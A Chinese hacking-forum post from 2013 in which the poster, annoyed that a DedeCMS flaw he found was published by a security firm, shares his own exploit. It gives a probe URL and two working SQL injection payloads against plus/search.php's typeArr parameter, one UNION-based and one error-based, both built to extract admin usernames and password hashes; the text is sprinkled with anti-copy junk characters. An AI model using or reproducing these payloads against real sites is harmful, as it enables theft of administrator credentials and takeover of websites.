转载不加作者名的没JJ- Z2 T- P) ~( A0 I5 ?
' w: ^+ `, c! ?- ^) @+ K7 n
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 v5 r8 {9 Z0 }, D( v1 J
! \6 q, V2 z* O# ~* \- Z1 ?既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& @2 @& @( R. R2 L" _$ H+ P) \0 w" H7 C& U k
我一般是这样测试的:
/ S2 w: [; ~- |' {% T6 {* H$ L& s# Z4 h, X% D
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a) L9 ?/ H# _2 w6 }( N5 A8 n
9 |/ n( S4 j# W' y: v
转载不加作者名的没JJ
2 }5 k/ u7 c$ h( O0 W9 q2 O" r- a* N5 i
作者:鬼哥
' I1 L* m5 i* |0 B; Y9 [. U: F8 W) q2 G6 b0 s4 d. y- O
6 \( I5 k0 Y V3 r; F2 ]; N, i& Y7 S; F. G }' D3 T
看结果如果提示/ K9 d' a7 }. ]& y3 X
& D. z" y% j( L [( z$ {5 j( wSafe Alert: Request Error step 2 !
, M2 P8 r: a& |3 G/ c4 I1 J4 R' u
) p8 ^: [3 g& A( z, f7 k那么直接用下面的exp
$ j- T4 s& L' B; u
# v$ l1 {" s- V2 Q5 lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
) ^8 e1 T- O+ [0 B! _
* O( g! S6 G @) a$ N/ J( h
3 s; Q: i5 t. d# Y; n看结果如果提示: }2 U" _; Q* o% ^7 j( }
( v# ]$ |4 ]% W I1 n& w$ i
Safe Alert: Request Error step 1 !
8 G5 g* _( g' e& `: |
# U) T& u7 N8 A# E2 g: ?0 Q那么直接用下面的exp' u8 O/ e- e. e. V1 F+ t _3 X
! J& _$ Q6 @ S0 m8 f3 g2 _. \ X
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
. b8 `, q. z+ g# B+ N* ?; h% B( z: H& S' T8 R9 k; g
( @2 o- W \, k5 |* F) d
如果正常显示证明漏洞不存在了。$ l$ }+ g" _6 F2 Y. y3 o
' c6 \1 ]6 ^3 F7 e0 l8 q
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对